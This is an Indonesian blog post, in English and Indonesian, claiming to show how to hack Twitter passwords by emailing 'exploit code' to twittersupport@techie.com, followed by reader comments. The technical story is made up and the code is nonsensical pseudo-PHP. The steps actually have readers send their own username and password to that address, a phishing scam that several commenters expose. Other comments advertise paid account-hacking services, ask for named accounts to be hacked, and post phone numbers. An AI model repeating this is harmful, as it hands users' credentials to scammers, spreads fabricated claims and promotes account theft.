Translate

English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

Yang Punya Twitter Follow, Ada quotes, info, tips dan update blog ini... Thanks^^


Cara Hack Password Twitter Tanpa Software / How To Hack Password Twitter Without Software

Share on :

Tipsapaja, Cara Hack Password Twitter Tanpa Software / How To Hack Password Twitter Without Software (indonesia dibawah)
English Version
I have the way to hack twitter Account without software check it now :

HOW HACKING TWITTER ACCOUNTS WORKS

Twitter has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned Twitter uses something similar to an email service to contact their databases.

But as usual, everything isn't as easy as it seems. For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password), luckily for us Twitter is so poorly programmed they also allow you to use a friends/followers account to verify your own (it's a glitch in the "Mutual Friends/Followers" service where they authenticate accounts by checking if the associated friends/followers email is related to the 'victims' account), in other words, if the person you want to get the login information from is following you on Twitter and your following them...you can use your own account to verify theirs (by confusing the database into thinking we are checking if you both mutually follow each other rather than the true act of reseting their password and getting them to send it to us) and get their login email and password sent to you...but the victim must be following you and you them.

HOW TO DO IT

1) First off you will need to get your username and the victims username, how do you do this?

Go to the victims twitter profile and look at your browsers address bar, at the end of all the address See something like this

Hack Twitter

Write it down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.


2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.

3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the twitter username of the victim and the friend authentication login information. I will give you step by step examples by trying the exploit code of my friend Sarah's account as the victim, see what parts you have to edit and with what:

Hack Twitter

1. Should be the victims username.
2. Should be your twitter login username to verify your the victims follower/friend.
3. Should be your password so the database can authentic you really are mutually following each other with the victim.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.

4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to twittersupport@techie.com which is twitters customer service email for forgotten passwords, in the Subject copy and paste the code below

$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();

Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item:

Hack Twitter

1. The email address of the twitter database's forgotten password customer service.
2. This is where you insert the victims username.
3. This is where you insert the victims gender (as mentioned above the twitter database is devided in a male section and female), put an M inside the quotes if they are a male or a F if they are a female.

5) After you have correctly written the To: and Subject: sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email. Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic twitter has that day, this is a sample of the email response you'll receive:

Hack Twitter

THE EXPLOIT CODE IN BOTTOM

Indonesia Version

CARA KERJA HACKING AKUN TWITTER

Twitter memiliki dua database (satu untuk pria dan satu untuk pengguna perempuan) di mana mereka menyimpan semua informasi dari pengguna mereka, jika Anda ingat email yang Anda gunakan untuk login namun lupa sandi, Anda dapat menggunakan 'Lupa kata sandi Anda?' pilihan, namun jika seperti saya Anda tidak memiliki informasi yang tidak mungkin untuk memulihkan hukum account tersebut.

Jika Anda tahu apa-apa tentang website pemrograman Anda tahu 'Lupa kata sandi Anda?' berada dalam kontak langsung dengan database untuk mengirim permintaan untuk mengambil informasi yang terlupakan untuk Anda, pada dasarnya apa artinya adalah jika Anda bertanya 'database untuk informasi yang login dengan' kode 'hak (dalam kasus kami mengeksploitasi ), itu akan mengirimkan kembali informasi tersebut.

Jadi semua saya harus mencari tahu adalah apa kode dan apa sistem yang mereka digunakan untuk menghubungi database melalui 'Lupa kata sandi Anda?' layanan, setelah beberapa minggu menulis dan menguji kode saya datang dengan orang yang tepat untuk pekerjaan itu dan setelah melakukan sedikit riset saya belajar Twitter menggunakan sesuatu yang mirip dengan layanan email untuk menghubungi database mereka.

Tapi seperti biasa, semuanya tidak semudah tampaknya. Untuk alasan keamanan database diprogram untuk memverifikasi account Anda meminta adalah benar kepunyaan Anda dan tidak seseorang elses sehingga mereka membutuhkan beberapa jenis otentikasi atau verifikasi (thats mengapa mereka mengirimkan link verifikasi ke email Anda saat membuat account Anda atau mengubah password Anda) , untungnya bagi kami Twitter begitu buruk diprogram mereka juga memungkinkan Anda untuk menggunakan teman / pengikut account untuk memverifikasi sendiri (itu kesalahan dalam layanan "Teman Reksa / Pengikut" di mana mereka mengotentikasi account dengan memeriksa jika terkait teman / email pengikut terkait dengan account 'korban'), dengan kata lain, jika orang yang Anda ingin mendapatkan informasi login dari yang mengikuti Anda di Twitter dan mengikuti mereka ... Anda Anda dapat menggunakan akun Anda sendiri untuk memverifikasi mereka (dengan membingungkan database ke dalam berpikir kita memeriksa apakah Anda berdua saling mengikuti satu sama lain daripada tindakan yang benar reseting password mereka dan membuat mereka kirim pada kami) dan mendapatkan login email dan password yang dikirim ke Anda ... tapi korban harus mengikuti Anda dan Anda mereka

CARA MELAKUKANNYA

1) Pertama Anda akan membutuhkan untuk mendapatkan username dan username korban, bagaimana Anda melakukan ini?

Pergi ke profil twitter korban dan melihat address bar browser, pada akhir dari semua alamat Lihat sesuatu seperti ini

Hack Twitter

Menuliskannya di suatu tempat karena Anda akan perlu menggunakannya sedikit lebih bawah, setelah itu dilakukan Anda dapat melanjutkan ke langkah 2.


2) Di bagian bawah halaman ini saya telah menyisipkan kode eksploitasi saya buat untuk menipu database, ini adalah bagian yang rumit karena Anda harus mengedit kode sedikit diri Anda sehingga sesuai dengan kebutuhan Anda saat mencari informasi login korban .

Gulir ke bawah ke bagian bawah halaman ini dan menemukan kode saya telah disorot dalam warna abu-abu sehingga Anda tahu apa untuk menyalin, pilih kode dan salin ke clipboard (tekan CTRL + C) kemudian paste (CTRL + V) pada notepad atau dokumen teks sehingga Anda dapat mengeditnya.

3) Setelah Anda memiliki kode di suatu tempat Anda dapat mengeditnya, Anda akan perlu untuk memasukkan tiga hal ke dalamnya, username twitter korban dan otentikasi informasi teman login. Saya akan memberikan contoh langkah demi langkah dengan mencoba memanfaatkan kode akun teman saya Sarah sebagai korban, lihat bagian mana Anda harus mengedit dan dengan apa:

Hack Twitter

1. Harus username korban.
2. Harus Anda Login nama pengguna twitter untuk memverifikasi Anda korban pengikut / teman.
3. Harus sandi Anda sehingga database dapat otentik Anda benar-benar saling mengikuti satu sama lain dengan korban.

Saat mengedit kode, tidak sengaja menghapus salah satu tanda kutip (") itu tidak akan bekerja, jadi pastikan Anda menaruh informasi di dalamnya.

4) Sekarang bahwa Anda memiliki kode eksploitasi diedit dan siap untuk dikirim, kami siap untuk mengirimkannya ke database melalui email, karena bukan email biasa Anda, tetapi email mengeksploitasi kita harus menggunakan Subyek khusus sehingga database tahu bagaimana membaca dalam bahasa pemrograman.

Ke alamat email Anda dan Compose email baru untuk twittersupport@techie.com yang twitters pelanggan layanan email untuk password lupa, dalam salinan Subyek dan paste kode di bawah ini

$[search_database = $find user+id= "VICTIMSUSERNAME", '%verification+user+gender' = }"F"{ begin_search();

Setelah Anda mengedit Subjek dan memasukkan alamat email, email Anda Terdiri akan terlihat seperti gambar di bawah, saya akan berhitung setiap item:

Hack Twitter


1. Alamat email dari layanan pelanggan lupa database twitter itu password.
2. Di sinilah Anda memasukkan username korban.
3. Di sinilah Anda memasukkan jenis kelamin korban (seperti yang disebutkan di atas database twitter terbagi dalam bagian pria dan wanita), menempatkan M di dalam tanda kutip jika mereka adalah laki-laki atau F jika mereka adalah perempuan.

5) Setelah Anda benar ditulis Kepada: dan Subject: bagian, Anda dapat melanjutkan untuk memasukkan kode exploit Anda sebelumnya diedit pada langkah 3 ke bagian tubuh email. Sekarang yang perlu anda lakukan adalah klik Kirim dan menunggu database untuk mengirimkan kembali jawaban itu dengan informasi.

Ini harus mengambil dari 12-24 jam tergantung pada lalu lintas twitter memiliki hari itu, ini adalah contoh dari respon email Anda akan menerima:

Hack Twitter

(Sorry Yang Bahasa Indonesia Hehehe, Bisa dipaahami gk? Klo gk tanya di comment)

THE EXPLOIT CODE

twt_select_db("find", $linkID) or die(twt_database_error()); $resultID = twt_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(twt_database_error()); $num_rows = db_num_rows($resultID); $row = twitter_fetch_array($resultID); $user_id = $row[0];

if ($user_id == "PUT_USERNAME_HERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that Username.
}
else {
// print "We're sorry, your follower does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%follower_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "YOUR_USERNAME_HERE"; (%follower_vulnerability_match%)
#user password = "YOURPASSWORDHERE"; (%follower_vulnerability_matchk%)
$follower_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
echo $empty_fields_message;
function decrypt userID password() {
$salt = "abchefghjkmnpqrstuvwxyz0123456789";
srand((double)microtime()*1000000);
$i = 0;
while ($i <= 7) { $num = decrypt() % 33; $tmp = substr($salt, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } mail($email_address, $subject, $message, "Twitter Password Reset Confirmation } /end$




Sekian Cara Hack Password Twitter Tanpa Software
So Only That How To Hack Password Twitter Without Software

Terima Kasih Telah Membaca / Thanks To Read : Cara Hack Password Twitter Tanpa Software / How To Hack Password Twitter Without Software
Cara Hack Password Twitter Tanpa Software / How To Hack Password Twitter Without Software

Keyword : Cara Hack Password Twitter Tanpa Software / How To Hack Password Twitter Without Software, Hack Password Twitter, Cara Hack Password Twiteer, Hack Twitter, Hack Twitter Account, Hack akun Twitter, Hack FaceBook, Hack Twitter Tanpa Software

ayo Ke Postingan Menarik tentang SEO Belajar Jurus Seo Ampuh + Cara Menghasilkan Uang Di Internet Gratis + Ebook

113 comments:

  1. aku sudah coba,tapi kiriman baliknya lama sekali -_- ini bener fungsi kan? 8-}

    ReplyDelete
    Replies
    1. Dedana bisa benerin twitter ga? Please yang bisa bantu dong:'( twitter gua ke hack:'( makasih mohon bantuannya ya:'( sms ya please 081314620288

      Delete
    2. Goblok.. LIAT DIA MINTA PASSWORD.. GOBLOK GOBLOK

      Delete
    3. Muter2 diinternet nyari software hack twitter gak ketemu2...
      Iseng2 tanya dosen, eh suruh ngunjungin www.servisinternet.blogspot.com
      ktemu deh softwarenya,, trus gua beli 50ribu
      Manteb deh, cuma modal 50ribu aj skrang gua jadi hacker twitter handal,,wkwkwkwkwkwk....
      Situs itu sbenernya nyediain software buat mbantu orng yg akunnya dihack, eh malah gua salahgunain buat nghack akun2 orng lain...
      hahahaha...jangan ditiru yak,, :D

      Delete
    4. mau dong di balikin account gue

      Delete
    5. minta dong gan softwarenya, ane beli deh, soalnya di situsnya masa harganya 100rb

      Delete
    6. ko kayanya kalian cukup TOLOL ya buat kehasut segampang itu :v ckckck

      Delete
    7. Reply for "h" : jangan mau deh ke situs situ. Tipu dia. Disuruh ngirimin pulsa @50rb ke dua nomer. Temen gue deh kena tipu.

      Delete
    8. Nie gan klo mw cara yang ampuh hack facebook orang :

      Cara Baru & Jitu Mencuri akun Facebook, Twitter, Yahoo, Gmail, Gemscool, Blogger, DLL ( NO TIPU )

      Bila Berminat bisa kunjungi blog saya :

      http://anonymousclassic.blogspot.com/

      Atau bisa join di grup saya :

      https://www.facebook.com/groups/PencuriHandal/

      Tenang aja udah banyak yang pesan koq, bisa di lihat bukti pembelian mereka :

      https://www.facebook.com/groups/PencuriHandal/doc/502838693117372/

      Bila ada yang kurang jelas bisa di tanyakan di grup, thanks :D

      Delete
    9. whhwhwhw, pada kena tipu. ga liat dengan jeli sih. udah jelas tersangka, suruh ngirim korban username dan passwordnya ke email si tersangka

      Delete
  2. Baru coba ini cara!!!msih nunggu konfirmasi

    ReplyDelete
    Replies
    1. cara bantunya gimana ? kalo ada yang bisa mention ke gue dong @hutomoR atau sms ke 083899040801

      Delete
    2. buat kk Vina mention aku dong @MrTwiboys

      Delete
    3. buat kk Vina mention aku dong @MrTwiboys

      Delete
  3. This comment has been removed by the author.

    ReplyDelete
  4. kak ga mudeng deh :( boleh minta tolong ga?

    ReplyDelete
  5. ini yang bodho admin blog ini atau dia mencoba menipu pembaca setianya , sayang banget padahal isi dari blog ini sangat bagus tapi di kotori dengan tipu muslihat seperti di atas , atau mungkin sich admin asal copy paste artikel dan tidak di coba !!!
    PERHATIAN JANGAN PERNAH COBA CARA DI ATAS SANGAT JELAS ITU BOHONG , dan jika teknik itu kalian gunakan justru password kalian yang terkirim ke sich penipu TWWITERSUPPORT@TECHIE.COM , dan apabila kalian terlanjur mengirim segera deh ganti password kalian .... segitu ajah SEMOGA SICH ADMIN MEMPERAKTEKAN DULU APA YANG DI TULIS DI BLOGNYA

    ReplyDelete
    Replies
    1. Makasih ya.... Saya udah coba dan bisa.... Tapi sekarang mungkin sudah tidak bisa

      Delete
    2. Fuck lah sama kau TOd mau nge hack account aku pulak kau... kalo kita mau hack account orang, knp username sama passord kita di minta?

      Delete
    3. Ngambil dari sini http://how-to-hack-twitter-accounts.angelfire.com/

      Delete
    4. Lagian , Sebenernya kalo kalian ngerti cara nya , itu ga ngasih email dan password kita ke orang ini , tapi ini xploit code jadi seharusnya tiwtter akan memeberi password ke email pemilik twitter yang akan kita hack , tetapi dengan code itu kita akalkan agar twitter memberi email balasan ke email kita ..

      Delete
    5. wkkwkwkwk trik SAMPAH gini mah udah ada dari gw awal-awal maen GAME-ON. gak nyangka ada yang make di TWITTER. begooook begoook LMFAO

      Delete
    6. we anonymous, mohon jangannmenggunakan cara ini.kalian sedang ditipu

      Delete
    7. orang bodoh mengikuti cara diatas hahaha

      Delete
    8. This comment has been removed by the author.

      Delete
    9. ka .
      bisa bantu gua nggak ?
      gw mw minta tolong nih :(

      Delete
    10. Nie gan klo mw cara yang ampuh hack facebook orang :

      Cara Baru & Jitu Mencuri akun Facebook, Twitter, Yahoo, Gmail, Gemscool, Blogger, DLL ( NO TIPU )

      Bila Berminat bisa kunjungi blog saya :

      http://anonymousclassic.blogspot.com/

      Atau bisa join di grup saya :

      https://www.facebook.com/groups/PencuriHandal/

      Tenang aja udah banyak yang pesan koq, bisa di lihat bukti pembelian mereka :

      https://www.facebook.com/groups/PencuriHandal/doc/502838693117372/

      Bila ada yang kurang jelas bisa di tanyakan di grup, thanks :D

      Delete
  6. ko ga di bls" si?

    ReplyDelete
  7. Replies
    1. Mungkin anda belum memfollow atau dia belum follow anda(itu syaratnya) atau mungkin sudah tidak work...

      Delete
  8. Postingan yang Sangat bagus dan menarik untuk dibaca tentang hack password .... Saya suka mengunjungi blog ini.

    ReplyDelete
  9. ini namanya teknik " Social Engineering "

    ReplyDelete
  10. jgn percaya. disuruh kirim user sama pass sendiri kok mau? yg ada acc lo2 pada yg kena hack =="

    ReplyDelete
  11. haha tekniknya lumayan cuma bahsa nya dewa bisa nipu orang nih ati2 aja..

    ReplyDelete
  12. So if they're not following me, it won't work?

    ReplyDelete
  13. penipuu..masah di suruh masukin nama pengguna dan passwordnya..hadehhh

    ReplyDelete
  14. hahaha mau yak ditipu.

    ReplyDelete
  15. bisa tolong bantu gue gak? gue bingung. plis

    ReplyDelete
  16. Bisa Minta Tolong nggak? hack-in twitter @Rynism_Official & @AngelousOFC Doong... sama kasih tau passwordnya @Kezia_ChiBi Please..

    ReplyDelete
    Replies
    1. maksud kamu apa mau ngehack twitter @rynism_Official & @AngelousOFC ?

      Delete
    2. yuk hack accountnya cherrybelle yuk! gembel bangsat mereka

      Delete
  17. bisa.. Trims yak!! :-D

    ReplyDelete
    Replies
    1. maksud nomor 5 apaan? kelasin dong gak ngerti

      Delete
    2. bagi bagi info dong gmana caranya ?? ga bgerti ??

      Delete
    3. Kayak apa caranya??
      kasih tau donk please

      Delete
    4. itu adminnya yg buat bisa.. Trims yak!! :-D

      Delete
  18. Ini cara-cara klasik yang bikin yang justru bikin para pembaca awam JADI KORBAN pembajakan akun.

    ReplyDelete
    Replies
    1. Anda hacker? Kamu bisa balikin acc twitter yg sudah ke hack ga:'( bantuannya dong please:'( sms aja ya pleaseeeee 085772304450

      Delete
  19. Semuanya please dong gua mohon banget udah 2bulan twitter gua kehack tapi masih nyangkut di writelonger jadi gua masih bisa mainin,tp semalem hape gua ke instal ulang jd twitter gua melayang:'( mohon banget gua butuh bantuan kalian ada yang bisa balikin twitter gua ga? @enylusinting :'( mohon ya bantuannya kalau mau bantu sms kesini ya 085772304450 makasih :'3

    ReplyDelete
  20. keren nih infonya, ijin nyoba om :-)

    visit back:http://infohackomputer.wordpress.com/

    ReplyDelete
  21. Gak ngerti broh...

    ReplyDelete
  22. Taeee,,,, heeeee,,,,

    ReplyDelete
  23. wkkwkwkwk trik SAMPAH gini mah udah ada dari gw awal-awal maen GAME-ON. gak nyangka ada yang make di TWITTER. begooook begoook LMFAO

    ReplyDelete
  24. twitter sodara gw ke hack gan bisa bantu gak account nya @ZeeKepo dulunya @ZeeAshilla pagi2 di Hack siangnya langsung dibajak.Mohon penting karna kalau udah bisa dibuka bakalan di deactive account.Thanks

    ReplyDelete
    Replies
    1. Mohon maaf saya tidak bisa bantu... Karena saya hanya bisa hack org yg memfollow saya dan saya follow dia.... Jadi kalau fanbase begitu susah....... Mohin maaf sekali lagi.....

      Delete
  25. gimana caranya ? ga ngerti ? klo bisa mah minta pang hacki in aja hehehee

    ReplyDelete
  26. This comment has been removed by a blog administrator.

    ReplyDelete
  27. minta hackin twitter nya @puterialt dong. kalau bener ga nipu sih. wk. ga usah alibi tapi ya, min.

    ReplyDelete
  28. min bisa minta tolong hack-in twitter twitter lama gue gak? soalnya kalau disearch masih keluar.. seriusan butuh,soalnya email dan password nya bener bener lupa. tolong dibalas ya min;'(

    ReplyDelete
  29. Muter2 diinternet nyari software hack twitter gak ketemu2...
    Iseng2 tanya dosen, eh suruh ngunjungin www.servisinternet.blogspot.com
    ktemu deh softwarenya,, trus gua beli 50ribu.
    Manteb deh, cuma modal 50ribu aj skrang gua jadi hacker twitter handal,,wkwkwkwkwkwk....
    Situs itu sbenernya nyediain software buat mbantu orng yg akunnya dihack, eh malah gua salahgunain buat nghack akun2 orng lain...
    hahahaha...jangan ditiru yak,, :D

    ReplyDelete
  30. Muter2 diinternet nyari software hack twitter gak ketemu2,, kalo ketemupun juga gak bsa dipake...
    Iseng2 tanya dosen, eh suruh ngunjungin situs SERVISINTERNET
    Ktemu deh softwarenya,, ada software hack twitter,facebook,gmail,yahoo,,lengkap...
    trus gua beli software hack twitter 100ribu...
    Manteb deh, cuma modal 100ribu aj skrang gua jadi hacker twitter handal,,berkat situs SERVISINTERNET ,,wkwkwkwkwkwk....
    Situs itu sbenernya nyediain software buat mbantu orng yg akunnya dihack, eh malah gua salahgunain buat nghack akun2 orng lain...
    hahahaha...jangan ditiru yak,, :D
    Buat yg otaknya sama kyk saya(hehe),, klik nih situs SERVISINTERNET atau www.servisinternet.blogspot.com

    ReplyDelete
  31. Eh, h
    Hack-in twitter @Stephencruzz1
    Gw ƍäª tau passwordnya

    ReplyDelete
  32. bener banget bos
    tinggal beli software hacknya di www.servisinternet.blogspot.com
    softwr hack fb cuma 50rb. twitter,gmail,dll cuma 100rb.
    tapi kita harus alasan.
    jangan ampe bilang beli software buat ngehack akun org lain, bilng aja mo buat benahin akun kita sndiri

    ReplyDelete

  33. Maksud ini apa ya ? "Menuliskannya di suatu tempat karena Anda akan perlu menggunakannya sedikit lebih bawah, setelah itu dilakukan Anda dapat melanjutkan ke langkah 2."

    ReplyDelete
  34. yaelah kejam skali.pada mau ngehack orang.,gmn klo dposisi yg dhack?:(

    ReplyDelete
  35. pantesan aja dari tadi gua bngung bacanya,,,ternyata ada penipuan yahhh :)

    ReplyDelete
  36. putus cinta gra2 www.servisinternet.blogspot.com
    Beli sftwr hack fb di tuh situs, trs nghack fb cwok gw.
    Sialan, cwok gw ganjen bngt dfb.
    BANGSAT

    ReplyDelete
  37. klau beli software di www.servisinternet.blogspot.com lama bgt proses ngirim softwrnya.
    softwarenya emang manjur sh, pi wktu ngirimna tu lama bngt. kmrin beli softwarenya aj nunggu 4jam bru dikirim

    ReplyDelete
  38. beli sftware di www.servisinternet.blogspot.com kok cuma bisa nghack 170 passwrd ajah ea?

    ReplyDelete
  39. ane dapet 283 pssword gan pake sftware di servisinternet.blogspot.com

    ReplyDelete
  40. pake itu buat ngehack twitter apa dapetin pasword twitternya ?

    ReplyDelete
  41. emang itu software nya beneran work gan yang di servis internet?

    ReplyDelete
  42. woyyy tau ga sih kalian, username sama password kita secara tidak langsung di minta sama dia. hati2 malah twitter kalian yg kena hack hahahaha

    ReplyDelete
  43. urusan hack fb www.servisinternet.blogspot.com udah gak ada tandingan gan.
    suer joz sob . . .

    ReplyDelete
  44. Ada yang bisa balikin acc gue ga @BieberTeamINDO? Gue bener-bener lupa email sm passwordnya apa T,T tolong yg bisa email ke yusi_maulia@yahoo.com pliiiis nambah2 pahala, imbalannya di akhirat :( ahahaha tp serius :(

    ReplyDelete
  45. hack twitter @adytdrmwn dia abis nipu gw 270rb
    kalo lg ada duit gw beli itu software, yang suka iseng boleh bantu :):

    ReplyDelete
  46. Ini yang bener yang mana sih? asli atau tipu ?

    ReplyDelete
  47. Buat aja account baru dan cobak deh cara di atas.. terbukti bener atau slh.. gampang kan.. heee (saran aj)

    ReplyDelete
  48. Berhasil gan. Thanks ya :)

    ReplyDelete
  49. apaan di www.servisinternet.blogspot.com itu bukan ngasih sofware tapi buatin phising .. wkwkwkwk :v

    ReplyDelete
  50. gimana caranya sih? ga ngerti ehehe. mau nge hack acc artis nih, bisa ga? @justinbieber @Harry_Styles @zaynmalik u,u

    ReplyDelete
  51. ya semoga berhasil. saya sudah coba tapi belum ada balasan, tunggu aja 1x 24 jam, kalau belum ada balasan, segera ganti password kalian...

    ReplyDelete
  52. ini sebenernya penipuan atau enggak sih? ada yang bilang berhasil, ada yang bilang tipu. respect thanks.

    ReplyDelete
  53. JANGAN PERNAH MENGIKUTI PERINTAH SPERTI DIATAS, ANDA LAH YANG AKAN MENJADI KORBAN CRACK ITU SENDIRI JIKA ANDA MENCOBA TRIK DIATAS. TERIMAKASIH . Anonymous_ID

    ReplyDelete
  54. Buat anonymous_ID ada blog apa web nya ngak ,? Berbagi info hack dong agar kita2 orang awam ngak kena tipu dengan trick2 yg kyk gini , thanks

    ReplyDelete
  55. anonymous dancok aaasssssuuuuuuu keliatan nya hacker tapi GOBLOK,.,. fuckkk :@

    ReplyDelete
  56. gimana nie ga ngarti gan ane wkwkwk

    ReplyDelete
  57. Kalo mau hack twitter or fb itu emang ada softwarenya gan, tapi rata" gak ada yang free, sekalinya ada pasti ribet downloadnya ^_^

    ReplyDelete
  58. sembuhkan akun ku yg terkunci verification code ,
    ntar aku bayar,...

    ReplyDelete
  59. web ini anjing!!!...saya gak ngerti.!!!

    ReplyDelete
  60. bng aku mau hack twitter, aku mau hack cuma mau pake unsername itu._.V gimana caranya?

    ReplyDelete
    Replies
    1. butuh bantuan?
      Sms aja 089669733858
      jangan ngikutin cara diatas ,dijamin itu PALSU!

      Delete
  61. Yang pengen tau caranya
    sms aja 089669733858
    kalo kalian ngikutin cara diatas dijamin PALSU! wkwkwk kalo kalian masi ngikutin bodo banget :D

    berbagi ilmu

    ReplyDelete
  62. Eh, hack deh twitternya @iqbaale terus kasih tau aye passwordnya. Terus SMS ke 081291635245

    ReplyDelete
  63. Software hack twitter beli di dokterakun.blogspot.com bagus jg mas mnurut saya,,ya walaupun hargnya mnurut sya agak mahal sih,,100ribu...
    tapi siplah,,

    ReplyDelete
  64. gan exploit codenya dikemanain?

    ReplyDelete
  65. Software hack gue mantebnya beli di www.INDONESOFT.blogspot.com brooww...
    Software hack fb,twitter,instagram,dll...
    yg software hack gemscoolnya dlu ada tp skrng dia udah kgak nglayanin...
    mantab dah...
    bayar bisa minta via pulsa...
    biar gak dicurigain si adminnya www.INDONESOFT.blogspot.com , kalo mau beli jangan smpe bilang mau buat aneh2, bilang aja mau memperbaiki akun sendiri yg kehack orng gak brtanggung jwb...

    ReplyDelete

Silahkan Berkomentar Yang Baik

Labels

 

Alexa

Total Pageviews

Blog Directory

Followers